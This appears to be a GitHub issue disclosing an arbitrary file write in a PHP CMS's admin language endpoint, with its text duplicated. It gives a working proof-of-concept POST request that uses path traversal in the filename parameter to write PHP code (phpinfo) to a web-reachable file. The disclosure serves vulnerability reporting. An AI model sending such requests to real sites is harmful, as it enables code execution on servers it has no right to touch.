You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
there is an arbitrary file read and rewrite in the backend of this cms via the link:
/hcms/admin/index.php/language/ajax
when post params : filename=..%2f..%2ftest.php&action=savelang&filecontent=%3C%3Fphp%0D%0A%0D%0Aecho+phpinfo()%3B%0D%0A%3F%3E
in the latest V4.0.0 edtion,
the cms try to use ajax to escape attacker to do same dangerous action like change file name etc
but it can also be catched by proxy
it will write your payload into any file which is writeable
we create new file test.php to check this vuln:
there is an arbitrary file read and rewrite in the backend of this cms via the link:
/hcms/admin/index.php/language/ajax
when post params : filename=..%2f..%2ftest.php&action=savelang&filecontent=%3C%3Fphp%0D%0A%0D%0Aecho+phpinfo()%3B%0D%0A%3F%3E
in the latest V4.0.0 edtion,
the cms try to use ajax to escape attacker to do same dangerous action like change file name etc
but it can also be catched by proxy
it will write your payload into any file which is writeable
![1](https://user-images.githubusercontent.com/27672638/52613779-4e185600-2eca-11e9-99de-ac66998caeae.JPG)
we create new file test.php to check this vuln:
we can access to it via link as http://domain/your file name
The text was updated successfully, but these errors were encountered: